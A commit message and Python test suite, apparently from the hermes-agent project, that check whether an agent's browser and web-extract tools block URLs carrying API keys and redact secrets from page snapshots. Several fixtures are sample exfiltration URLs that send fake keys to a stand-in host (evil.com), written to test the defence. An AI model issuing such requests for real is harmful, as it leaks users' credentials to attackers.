Follow-up on the salvaged #49830 hardening. The contributor's sensitive query-param set included bare English words (code, key, auth, session, sig) that double as ordinary page facets — ?code= on promo/challenge pages, ?key= as a search facet, ?session= on blogs — so web_extract and cloud browser_navigate would refuse a large slice of normal browsing. Narrow the set to unambiguously credential-named params (access_token, authorization, client_secret, password, token, x-amz-signature, ...). Prefix-based vendor-key redaction (is_safe_url) still catches recognizable key shapes; this set is the belt-and-suspenders for opaque secrets carried under an explicit credential-named parameter. Also fixes two intra-PR-staleness test breakages surfaced by salvaging onto current main: - web_extract_tool() no longer accepts use_llm_processing= (signature changed since the PR was authored) — dropped the invalid kwarg. - agent.redact now fully masks keyed 'token=<secret>' to 'token=***' instead of partial 'sk-...'; the console-redaction test now asserts the real invariant (secret body gone) rather than the exact mask format. Added a regression test that generic English-word query params are NOT blocked by the credential guard.
363 lines
15 KiB
Python
363 lines
15 KiB
Python
"""Tests for secret exfiltration prevention in browser and web tools."""
|
|
|
|
import json
|
|
from unittest.mock import patch, MagicMock
|
|
import pytest
|
|
|
|
|
|
@pytest.fixture(autouse=True)
|
|
def _ensure_redaction_enabled(monkeypatch):
|
|
"""Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
|
|
monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
|
|
monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
|
|
|
|
|
|
class TestBrowserSecretExfil:
|
|
"""Verify browser_navigate blocks URLs containing secrets."""
|
|
|
|
def test_blocks_api_key_in_url(self):
|
|
from tools.browser_tool import browser_navigate
|
|
result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is False
|
|
assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
|
|
|
|
def test_blocks_openrouter_key_in_url(self):
|
|
from tools.browser_tool import browser_navigate
|
|
result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is False
|
|
|
|
def test_cloud_blocks_opaque_sensitive_query_param(self):
|
|
"""Cloud browser providers must not receive opaque token query params."""
|
|
from tools.browser_tool import browser_navigate
|
|
|
|
with patch("tools.browser_tool._is_local_backend", return_value=False), \
|
|
patch("tools.browser_tool._navigation_session_key", return_value="default"), \
|
|
patch("tools.browser_tool._run_browser_command") as mock_run:
|
|
result = browser_navigate("https://example.com/callback?token=opaque-oauth-code")
|
|
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is False
|
|
assert "credential-like query parameter" in parsed["error"]
|
|
assert "token" in parsed["error"]
|
|
mock_run.assert_not_called()
|
|
|
|
def test_local_browser_allows_opaque_sensitive_query_param(self):
|
|
"""Local browser/CDP sessions may navigate magic-link style URLs."""
|
|
from tools.browser_tool import browser_navigate
|
|
|
|
mock_result = {"success": True, "data": {"title": "ok", "url": "https://example.com/callback?token=opaque-oauth-code"}}
|
|
with patch("tools.browser_tool._run_browser_command", return_value=mock_result), \
|
|
patch("tools.browser_tool._get_session_info", return_value={"_first_nav": False}), \
|
|
patch("tools.browser_tool._is_local_backend", return_value=True):
|
|
result = browser_navigate("https://example.com/callback?token=opaque-oauth-code")
|
|
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is True
|
|
|
|
def test_allows_normal_url(self):
|
|
"""Normal URLs pass the secret check (may fail for other reasons)."""
|
|
from tools.browser_tool import browser_navigate
|
|
# Patch the actual browser command — we only care that the secret
|
|
# check doesn't block a clean URL, not that Chrome starts in CI.
|
|
mock_result = {"success": True, "data": {"title": "ok", "url": "https://github.com/NousResearch/hermes-agent"}}
|
|
with patch("tools.browser_tool._run_browser_command", return_value=mock_result), \
|
|
patch("tools.browser_tool._get_session_info", return_value={"_first_nav": False}), \
|
|
patch("tools.browser_tool._is_local_backend", return_value=True):
|
|
result = browser_navigate("https://github.com/NousResearch/hermes-agent")
|
|
parsed = json.loads(result)
|
|
# Should NOT be blocked by secret detection
|
|
assert "API key or token" not in parsed.get("error", "")
|
|
|
|
def test_normalizes_non_ascii_url_before_navigation(self):
|
|
from tools.browser_tool import browser_navigate
|
|
|
|
captured = {}
|
|
|
|
def mock_run(_session_key, command, args, **_kwargs):
|
|
if command == "open":
|
|
captured["url"] = args[0]
|
|
return {"success": True, "data": {"title": "ok", "url": args[0]}}
|
|
|
|
with patch("tools.browser_tool._run_browser_command", side_effect=mock_run), \
|
|
patch("tools.browser_tool._get_session_info", return_value={"_first_nav": False}), \
|
|
patch("tools.browser_tool._is_local_backend", return_value=True):
|
|
result = browser_navigate("https://wttr.in/Köln")
|
|
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is True
|
|
assert captured["url"] == "https://wttr.in/K%C3%B6ln"
|
|
|
|
|
|
class TestWebExtractSecretExfil:
|
|
"""Verify web_extract_tool blocks URLs containing secrets."""
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_blocks_api_key_in_url(self):
|
|
from tools.web_tools import web_extract_tool
|
|
result = await web_extract_tool(
|
|
urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
|
|
)
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is False
|
|
assert "Blocked" in parsed["error"]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_blocks_opaque_sensitive_query_param(self):
|
|
from tools.web_tools import web_extract_tool
|
|
|
|
result = await web_extract_tool(
|
|
urls=["https://example.com/callback?access_token=opaque-oauth-value"],
|
|
)
|
|
|
|
parsed = json.loads(result)
|
|
assert parsed["success"] is False
|
|
assert "credential-like query parameter" in parsed["error"]
|
|
assert "access_token" in parsed["error"]
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_allows_ambiguous_english_word_query_param(self):
|
|
"""Generic query names that double as normal page facets must NOT block.
|
|
|
|
``?code=`` (promo/challenge pages), ``?key=`` (search facets),
|
|
``?session=`` etc. are ordinary browsing params. Only unambiguously
|
|
credential-named params are blocked, so web_extract stays usable.
|
|
"""
|
|
from tools.web_tools import web_extract_tool
|
|
|
|
for url in (
|
|
"https://leetcode.com/problems/two-sum/?code=twosum",
|
|
"https://github.com/search?q=hermes&code=1",
|
|
"https://example.com/blog?session=summer",
|
|
):
|
|
result = await web_extract_tool(urls=[url])
|
|
parsed = json.loads(result)
|
|
# Not blocked by the credential-query guard (may fail for other
|
|
# reasons like a missing backend, but never with this specific
|
|
# error string).
|
|
if parsed.get("success") is False:
|
|
assert "credential-like query parameter" not in parsed.get("error", ""), url
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_allows_normal_url(self):
|
|
from tools.web_tools import web_extract_tool
|
|
# This will fail due to no API key, but should NOT be blocked by secret check
|
|
result = await web_extract_tool(urls=["https://example.com"])
|
|
parsed = json.loads(result)
|
|
# Should fail for API/config reason, not secret blocking
|
|
assert "API key" not in parsed.get("error", "") or "Blocked" not in parsed.get("error", "")
|
|
|
|
@pytest.mark.asyncio
|
|
async def test_normalizes_non_ascii_url_before_extract_provider(self, monkeypatch):
|
|
from agent.web_search_provider import WebSearchProvider
|
|
from agent import web_search_registry
|
|
from tools import web_tools
|
|
|
|
class FakeExtractProvider(WebSearchProvider):
|
|
@property
|
|
def name(self) -> str:
|
|
return "fake-extract"
|
|
|
|
def is_available(self) -> bool:
|
|
return True
|
|
|
|
def supports_search(self) -> bool:
|
|
return False
|
|
|
|
def supports_extract(self) -> bool:
|
|
return True
|
|
|
|
def extract(self, urls, **_kwargs):
|
|
return [
|
|
{
|
|
"url": urls[0],
|
|
"title": "ok",
|
|
"content": "ok",
|
|
"raw_content": "ok",
|
|
}
|
|
]
|
|
|
|
async def allow_url(_url: str) -> bool:
|
|
return True
|
|
|
|
web_search_registry._reset_for_tests()
|
|
web_search_registry.register_provider(FakeExtractProvider())
|
|
monkeypatch.setattr(web_tools, "_ensure_web_plugins_loaded", lambda: None)
|
|
monkeypatch.setattr(web_tools, "_get_extract_backend", lambda: "fake-extract")
|
|
monkeypatch.setattr(web_tools, "async_is_safe_url", allow_url)
|
|
|
|
try:
|
|
result = await web_tools.web_extract_tool(
|
|
urls=["https://wttr.in/Köln"],
|
|
)
|
|
finally:
|
|
web_search_registry._reset_for_tests()
|
|
|
|
parsed = json.loads(result)
|
|
assert parsed["results"][0]["url"] == "https://wttr.in/K%C3%B6ln"
|
|
|
|
|
|
class TestBrowserSnapshotRedaction:
|
|
"""Verify secrets in page snapshots are redacted before auxiliary LLM calls."""
|
|
|
|
def test_extract_relevant_content_redacts_secrets(self):
|
|
"""Snapshot containing secrets should be redacted before call_llm."""
|
|
from tools.browser_tool import _extract_relevant_content
|
|
|
|
# Build a snapshot with a fake Anthropic-style key embedded
|
|
fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
|
|
snapshot_with_secret = (
|
|
"heading: Dashboard Settings\n"
|
|
f"text: API Key: {fake_key}\n"
|
|
"button [ref=e5]: Save\n"
|
|
)
|
|
|
|
captured_prompts = []
|
|
|
|
def mock_call_llm(**kwargs):
|
|
prompt = kwargs["messages"][0]["content"]
|
|
captured_prompts.append(prompt)
|
|
mock_resp = MagicMock()
|
|
mock_resp.choices = [MagicMock()]
|
|
mock_resp.choices[0].message.content = "Dashboard with save button [ref=e5]"
|
|
return mock_resp
|
|
|
|
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
|
_extract_relevant_content(snapshot_with_secret, "check settings")
|
|
|
|
assert len(captured_prompts) == 1
|
|
# The middle portion of the key must not appear in the prompt
|
|
assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
|
|
# Non-secret content should survive
|
|
assert "Dashboard" in captured_prompts[0]
|
|
assert "ref=e5" in captured_prompts[0]
|
|
|
|
def test_extract_relevant_content_no_task_redacts_secrets(self):
|
|
"""Snapshot without user_task should also redact secrets."""
|
|
from tools.browser_tool import _extract_relevant_content
|
|
|
|
fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
|
|
snapshot_with_secret = (
|
|
f"text: OPENAI_API_KEY={fake_key}\n"
|
|
"link [ref=e2]: Home\n"
|
|
)
|
|
|
|
captured_prompts = []
|
|
|
|
def mock_call_llm(**kwargs):
|
|
prompt = kwargs["messages"][0]["content"]
|
|
captured_prompts.append(prompt)
|
|
mock_resp = MagicMock()
|
|
mock_resp.choices = [MagicMock()]
|
|
mock_resp.choices[0].message.content = "Page with home link [ref=e2]"
|
|
return mock_resp
|
|
|
|
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
|
_extract_relevant_content(snapshot_with_secret)
|
|
|
|
assert len(captured_prompts) == 1
|
|
assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
|
|
|
|
def test_extract_relevant_content_normal_snapshot_unchanged(self):
|
|
"""Snapshot without secrets should pass through normally."""
|
|
from tools.browser_tool import _extract_relevant_content
|
|
|
|
normal_snapshot = (
|
|
"heading: Welcome\n"
|
|
"text: Click the button below to continue\n"
|
|
"button [ref=e1]: Continue\n"
|
|
)
|
|
|
|
captured_prompts = []
|
|
|
|
def mock_call_llm(**kwargs):
|
|
prompt = kwargs["messages"][0]["content"]
|
|
captured_prompts.append(prompt)
|
|
mock_resp = MagicMock()
|
|
mock_resp.choices = [MagicMock()]
|
|
mock_resp.choices[0].message.content = "Welcome page with continue button"
|
|
return mock_resp
|
|
|
|
with patch("tools.browser_tool.call_llm", mock_call_llm):
|
|
_extract_relevant_content(normal_snapshot, "proceed")
|
|
|
|
assert len(captured_prompts) == 1
|
|
assert "Welcome" in captured_prompts[0]
|
|
assert "Continue" in captured_prompts[0]
|
|
|
|
|
|
class TestCamofoxAnnotationRedaction:
|
|
"""Verify annotation context is redacted before vision LLM call."""
|
|
|
|
def test_annotation_context_secrets_redacted(self):
|
|
"""Secrets in accessibility tree annotation should be masked."""
|
|
from agent.redact import redact_sensitive_text
|
|
|
|
fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
|
|
annotation = (
|
|
"\n\nAccessibility tree (element refs for interaction):\n"
|
|
f"text: Token: {fake_token}\n"
|
|
"button [ref=e3]: Copy\n"
|
|
)
|
|
result = redact_sensitive_text(annotation)
|
|
assert "FAKEGITHUBTOKEN123456789" not in result
|
|
# Non-secret parts preserved
|
|
assert "button" in result
|
|
assert "ref=e3" in result
|
|
|
|
def test_annotation_env_dump_redacted(self):
|
|
"""Env var dump in annotation context should be redacted."""
|
|
from agent.redact import redact_sensitive_text
|
|
|
|
fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
|
|
fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
|
|
annotation = (
|
|
"\n\nAccessibility tree (element refs for interaction):\n"
|
|
f"text: ANTHROPIC_API_KEY={fake_anth}\n"
|
|
f"text: OPENAI_API_KEY={fake_oai}\n"
|
|
"text: PATH=/usr/local/bin\n"
|
|
)
|
|
result = redact_sensitive_text(annotation)
|
|
assert "ANTHROPICFAKEKEY123456789" not in result
|
|
assert "OPENAIFAKEKEY99887766" not in result
|
|
assert "PATH=/usr/local/bin" in result
|
|
|
|
|
|
class TestBrowserSupervisorRedaction:
|
|
"""Verify supervisor dialog snapshots redact page-originated secrets."""
|
|
|
|
def test_pending_and_recent_dialog_messages_redacted(self):
|
|
from tools.browser_supervisor import DialogRecord, PendingDialog, SupervisorSnapshot
|
|
|
|
fake_key = "sk-" + "SUPERVISORDIALOGSECRET1234567890"
|
|
snapshot = SupervisorSnapshot(
|
|
pending_dialogs=(PendingDialog(
|
|
id="d1",
|
|
type="prompt",
|
|
message=f"Enter API key {fake_key}",
|
|
default_prompt=fake_key,
|
|
opened_at=1.0,
|
|
cdp_session_id="session-1",
|
|
),),
|
|
recent_dialogs=(DialogRecord(
|
|
id="d2",
|
|
type="alert",
|
|
message=f"Recent key {fake_key}",
|
|
opened_at=1.0,
|
|
closed_at=2.0,
|
|
closed_by="agent",
|
|
),),
|
|
frame_tree={"top": {"frame_id": "f1", "url": "about:blank", "origin": "null", "is_oopif": False}},
|
|
console_errors=(),
|
|
active=True,
|
|
cdp_url="ws://example.invalid/devtools/browser/mock",
|
|
task_id="test",
|
|
)
|
|
|
|
result = snapshot.to_dict()
|
|
serialized = str(result)
|
|
assert "SUPERVISORDIALOGSECRET" not in serialized
|
|
assert result["pending_dialogs"][0]["message"].startswith("Enter API key sk-")
|
|
assert result["pending_dialogs"][0]["default_prompt"].startswith("sk-")
|
|
assert result["recent_dialogs"][0]["message"].startswith("Recent key sk-")
|